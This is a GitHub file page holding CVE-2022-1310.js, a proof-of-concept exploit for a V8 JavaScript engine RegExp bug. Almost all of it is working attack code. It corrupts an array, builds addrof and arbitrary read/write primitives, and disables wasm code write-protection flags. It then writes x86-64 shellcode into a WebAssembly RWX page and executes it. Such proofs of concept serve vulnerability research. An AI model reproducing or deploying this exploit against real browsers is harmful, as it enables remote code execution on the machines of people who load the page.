-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2022-1310.js
186 lines (144 loc) · 17.6 KB
/
CVE-2022-1310.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
class Helpers {
constructor() {
this.buf = new ArrayBuffer(8);
this.dv = new DataView(this.buf);
this.u8 = new Uint8Array(this.buf);
this.u32 = new Uint32Array(this.buf);
this.u64 = new BigUint64Array(this.buf);
this.f32 = new Float32Array(this.buf);
this.f64 = new Float64Array(this.buf);
this.roots = new Array(0x30000);
this.index = 0;
}
pair_i32_to_f64(p1, p2) {
this.u32[0] = p1;
this.u32[1] = p2;
return this.f64[0];
}
i64tof64(i) {
this.u64[0] = i;
return this.f64[0];
}
f64toi64(f) {
this.f64[0] = f;
return this.u64[0];
}
set_i64(i) {
this.u64[0] = i;
}
set_l(i) {
this.u32[0] = i;
}
set_h(i) {
this.u32[1] = i;
}
get_i64() {
return this.u64[0];
}
ftoil(f) {
this.f64[0] = f;
return this.u32[0]
}
ftoih(f) {
this.f64[0] = f;
return this.u32[1]
}
add_ref(object) {
this.roots[this.index++] = object;
}
mark_sweep_gc() {
new ArrayBuffer(0x7fe00000);
}
scavenge_gc() {
for (var i = 0; i < 8; i++) {
// fill up new space external backing store bytes
this.add_ref(new ArrayBuffer(0x200000));
}
this.add_ref(new ArrayBuffer(8));
}
hex(i) {
return i.toString(16).padStart(16, "0");
}
breakpoint() {
this.buf.slice();
}
}
var helper = new Helpers();
var corrupted_array;
var fake_object_array;
var re = new RegExp('foo', 'g');
var match_object = {};
match_object[0] = {
toString: function () {
return "";
}
};
re.exec = function () {
helper.mark_sweep_gc();
delete re.exec; // transition back to initial regexp map
re.lastIndex = 1073741823; // maximum smi, adding one will result in a HeapNumber
new Array(256); // add space before NewHeapNumber<newSpace>
RegExp.prototype.exec = function () {
throw ''; // break out of Regexp.replace
}
return match_object;
};
try {
var newstr = re[Symbol.replace]("fooooo", ".$");
} catch (e) { }
helper.scavenge_gc();
helper.mark_sweep_gc();
fake_object_array = [1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309];
var addrof_array = new Array(32);
corrupted_array = re.lastIndex;
// Adapt this with your own value to create a fake array object
// print(helper.pair_i32_to_f64(0x00203b19, 0x2269));
// print(helper.pair_i32_to_f64(0x0343151, 0x60000));
var parent_array_addr = helper.ftoil(corrupted_array[0]);
// print(helper.hex(parent_array_addr));
function addrof(obj) {
addrof_array[0] = obj;
return corrupted_array[5];
}
function arbRead(where) {
fake_object_array[131] = helper.pair_i32_to_f64(where - 8, 0x20);
return corrupted_array[0];
}
function arbWrite(where, what) {
fake_object_array[131] = helper.pair_i32_to_f64(where - 8, 0x20);
corrupted_array[0] = helper.i64tof64(what);
}
let mem = new ArrayBuffer(1024);
let dv = new DataView(mem);
let mem_addr = helper.ftoil(addrof(mem));
print("[+] mem addr:", helper.hex(mem_addr))
// remove wasm write protection, use your own offset
let TARGET = {
'base': 0x7ff6,
'FLAG_write_protect_code_memory': 0xcde20b10,
'FLAG_wasm_memory_protection_keys': 0xcde20aa5,
'FLAG_wasm_write_protect_code_memory': 0xcde20aa4
}
arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_write_protect_code_memory'], TARGET['base'])));
dv.setUint8(0, 0, true);
arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_wasm_memory_protection_keys'], TARGET['base'])));
dv.setUint8(0, 0, true);
arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_wasm_write_protect_code_memory'], TARGET['base'])));
dv.setUint8(0, 0, true);
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
fake_object_array[131] = helper.pair_i32_to_f64(0x0343151, 0x60000);
let wasmInstance_addr = helper.ftoil(addrof(wasmInstance));
print("[+] mem addr:", helper.hex(wasmInstance_addr));
let rwx_page = helper.f64toi64(arbRead(wasmInstance_addr + 0x60));
print("[+] rwx_page addr:", helper.hex(rwx_page));
arbWrite(mem_addr + 0x1c, rwx_page);
let shellcode = [72, 49, 255, 72, 247, 231, 101, 72, 139, 88, 96, 72, 139, 91, 24, 72, 139, 91, 32, 72, 139, 27, 72, 139, 27, 72, 139, 91, 32, 73, 137, 216, 139, 91, 60, 76, 1, 195, 72, 49, 201, 102, 129, 193, 255, 136, 72, 193, 233, 8, 139, 20, 11, 76, 1, 194, 77, 49, 210, 68, 139, 82, 28, 77, 1, 194, 77, 49, 219, 68, 139, 90, 32, 77, 1, 195, 77, 49, 228, 68, 139, 98, 36, 77, 1, 196, 235, 50, 91, 89, 72, 49, 192, 72, 137, 226, 81, 72, 139, 12, 36, 72, 49, 255, 65, 139, 60, 131, 76, 1, 199, 72, 137, 214, 243, 166, 116, 5, 72, 255, 192, 235, 230, 89, 102, 65, 139, 4, 68, 65, 139, 4, 130, 76, 1, 192, 83, 195, 72, 49, 201, 128, 193, 7, 72, 184, 15, 168, 150, 145, 186, 135, 154, 156, 72, 247, 208, 72, 193, 232, 8, 80, 81, 232, 176, 255, 255, 255, 73, 137, 198, 72, 49, 201, 72, 247, 225, 80, 72, 184, 156, 158, 147, 156, 209, 154, 135, 154, 72, 247, 208, 80, 72, 137, 225, 72, 255, 194, 72, 131, 236, 32, 65, 255, 214, 195];
for (var i = 0; i < shellcode.length; i++) {
dv.setUint8(i, shellcode[i], true);
}
corrupted_array = null;
re.lastIndex = {};
f();